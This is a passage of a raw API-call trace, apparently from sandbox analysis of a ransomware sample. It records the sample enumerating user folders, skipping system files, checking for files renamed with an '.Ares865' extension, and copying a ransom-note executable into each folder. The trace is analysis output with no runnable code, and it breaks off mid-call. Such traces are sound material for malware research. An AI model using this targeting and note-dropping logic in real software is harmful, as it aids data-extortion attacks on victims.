(lpString1="Ares865", lpString2="Ares865") returned 0 [0089.954] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49569760, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49569760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.954] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.954] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x49c1b540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1907e90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wildlife.wmv.Ares865", cAlternateFileName="")) returned 1 [0089.954] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.954] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="aoldtz.exe") returned 1 [0089.954] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2=".") returned 1 [0089.954] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="..") returned 1 [0089.954] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="windows") returned -1 [0089.954] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="bootmgr") returned 1 [0089.954] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="temp") returned 1 [0089.954] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="pagefile.sys") returned 1 [0089.954] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="boot") returned 1 [0089.954] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="ids.txt") returned 1 [0089.955] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="ntuser.dat") returned 1 [0089.955] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="perflogs") returned 1 [0089.955] lstrcmpiW (lpString1="Wildlife.wmv.Ares865", lpString2="MSBuild") returned 1 [0089.955] lstrlenW (lpString="Wildlife.wmv.Ares865") returned 20 [0089.955] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Videos\\Sample Videos\\desktop.ini.Ares865") returned 72 [0089.955] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Wildlife.wmv.Ares865" | out: lpString1="Wildlife.wmv.Ares865") returned="Wildlife.wmv.Ares865" [0089.955] lstrlenW (lpString="Wildlife.wmv.Ares865") returned 20 [0089.955] lstrlenW (lpString="Ares865") returned 7 [0089.955] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.955] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x49c1b540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1907e90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wildlife.wmv.Ares865", cAlternateFileName="")) returned 0 [0089.955] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.955] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ab0 [0089.955] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Documents\\My Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Documents\\My Pictures") returned="C:\\Users\\All Users\\Documents\\My Pictures" [0089.955] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0089.955] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Pictures") returned 40 [0089.955] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Documents\\My Pictures" | out: lpString1="C:\\Users\\All Users\\Documents\\My Pictures") returned="C:\\Users\\All Users\\Documents\\My Pictures" [0089.955] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.955] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Documents\\My Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\documents\\my pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.956] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.956] GetLastError () returned 0x0 [0089.956] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.956] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.956] CloseHandle (hObject=0x120) returned 1 [0089.956] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.956] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.956] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Documents\\My Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4b96a420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4b96a420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.956] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.956] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.956] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.956] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4b96a420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4b96a420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.957] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.957] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.957] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.957] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.957] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="")) returned 1 [0089.957] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.957] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0089.957] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0089.957] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0089.957] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0089.957] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0089.957] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0089.957] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0089.958] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0089.958] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0089.958] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0089.958] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0089.958] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0089.958] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0089.958] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Pictures\\*") returned 42 [0089.958] lstrcpyW (in: lpString1=0x2cce452, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0089.958] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0089.958] lstrlenW (lpString="Ares865") returned 7 [0089.958] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.958] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x496c03c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x496c03c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.958] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.959] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4d6931a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0089.959] lstrcmpiW (lpString1="Sample Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.959] lstrcmpiW (lpString1="Sample Pictures", lpString2="aoldtz.exe") returned 1 [0089.959] lstrcmpiW (lpString1="Sample Pictures", lpString2=".") returned 1 [0089.959] lstrcmpiW (lpString1="Sample Pictures", lpString2="..") returned 1 [0089.959] lstrcmpiW (lpString1="Sample Pictures", lpString2="windows") returned -1 [0089.959] lstrcmpiW (lpString1="Sample Pictures", lpString2="bootmgr") returned 1 [0089.959] lstrcmpiW (lpString1="Sample Pictures", lpString2="temp") returned -1 [0089.959] lstrcmpiW (lpString1="Sample Pictures", lpString2="pagefile.sys") returned 1 [0089.959] lstrcmpiW (lpString1="Sample Pictures", lpString2="boot") returned 1 [0089.959] lstrcmpiW (lpString1="Sample Pictures", lpString2="ids.txt") returned 1 [0089.959] lstrcmpiW (lpString1="Sample Pictures", lpString2="ntuser.dat") returned 1 [0089.959] lstrcmpiW (lpString1="Sample Pictures", lpString2="perflogs") returned 1 [0089.959] lstrcmpiW (lpString1="Sample Pictures", lpString2="MSBuild") returned 1 [0089.959] lstrlenW (lpString="Sample Pictures") returned 15 [0089.959] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Pictures\\desktop.ini.Ares865") returned 60 [0089.959] lstrcpyW (in: lpString1=0x2cce452, lpString2="Sample Pictures" | out: lpString1="Sample Pictures") returned="Sample Pictures" [0089.959] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0089.959] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1608 [0089.960] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0089.960] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4d6931a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0089.960] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.960] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ab0 [0089.960] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures") returned="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures" [0089.960] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0089.960] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0089.960] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures") returned 56 [0089.960] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures" | out: lpString1="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures") returned="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures" [0089.960] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.960] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\documents\\my pictures\\sample pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.960] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.961] GetLastError () returned 0x0 [0089.961] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.961] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.961] CloseHandle (hObject=0x120) returned 1 [0089.961] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.961] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.961] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4d6931a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.961] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.961] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.961] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.961] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4d6931a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.961] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.961] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.961] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.961] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.961] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4bb0d340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xd6e30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Chrysanthemum.jpg.Ares865", cAlternateFileName="CHRYSA~1.ARE")) returned 1 [0089.961] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.961] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0089.961] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2=".") returned 1 [0089.961] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="..") returned 1 [0089.962] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="windows") returned -1 [0089.962] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="bootmgr") returned 1 [0089.962] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="temp") returned -1 [0089.962] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="pagefile.sys") returned -1 [0089.962] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="boot") returned 1 [0089.962] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="ids.txt") returned -1 [0089.962] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="ntuser.dat") returned -1 [0089.962] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="perflogs") returned -1 [0089.962] lstrcmpiW (lpString1="Chrysanthemum.jpg.Ares865", lpString2="MSBuild") returned -1 [0089.962] lstrlenW (lpString="Chrysanthemum.jpg.Ares865") returned 25 [0089.962] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures\\*") returned 58 [0089.962] lstrcpyW (in: lpString1=0x2cce472, lpString2="Chrysanthemum.jpg.Ares865" | out: lpString1="Chrysanthemum.jpg.Ares865") returned="Chrysanthemum.jpg.Ares865" [0089.962] lstrlenW (lpString="Chrysanthemum.jpg.Ares865") returned 25 [0089.962] lstrlenW (lpString="Ares865") returned 7 [0089.962] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.962] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4bd22680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xceb80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desert.jpg.Ares865", cAlternateFileName="")) returned 1 [0089.962] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.962] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0089.962] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2=".") returned 1 [0089.962] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="..") returned 1 [0089.962] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="windows") returned -1 [0089.962] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="bootmgr") returned 1 [0089.962] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="temp") returned -1 [0089.962] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="pagefile.sys") returned -1 [0089.962] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="boot") returned 1 [0089.962] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="ids.txt") returned -1 [0089.962] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="ntuser.dat") returned -1 [0089.962] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="perflogs") returned -1 [0089.962] lstrcmpiW (lpString1="Desert.jpg.Ares865", lpString2="MSBuild") returned -1 [0089.962] lstrlenW (lpString="Desert.jpg.Ares865") returned 18 [0089.962] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures\\Chrysanthemum.jpg.Ares865") returned 82 [0089.962] lstrcpyW (in: lpString1=0x2cce472, lpString2="Desert.jpg.Ares865" | out: lpString1="Desert.jpg.Ares865") returned="Desert.jpg.Ares865" [0089.962] lstrlenW (lpString="Desert.jpg.Ares865") returned 18 [0089.962] lstrlenW (lpString="Ares865") returned 7 [0089.962] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.962] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4c492b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="")) returned 1 [0089.962] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.963] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0089.963] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0089.963] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0089.963] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0089.963] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0089.963] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0089.963] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0089.963] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0089.963] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0089.963] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0089.963] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0089.963] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0089.963] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0089.963] lstrlenW (lpString="C:\\Users\\All Users\\Documents\\My Pictures\\Sample Pictures\\Desert.jpg.Ares865") returned 75 [0089.963] lstrcpyW (in: lpString1=0x2cce472, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0089.963] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0089.963] lstrlenW (lpString="Ares865") returned 7 [0089.963] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.963] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4970c680, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4970c680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.963] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.963] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x91860, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hydrangeas.jpg.Ares865", cAlternateFileName="HYDRAN~1.ARE")) returned 1 [0089.963] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.963] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0089.963] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2=".") returned 1 [0089.963] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="..") returned 1 [0089.963] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="windows") returned -1 [0089.963] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="bootmgr") returned 1 [0089.963] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", lpString2="temp") returned -1 [0089.963] lstrcmpiW (lpString1="Hydrangeas.jpg.Ares865", 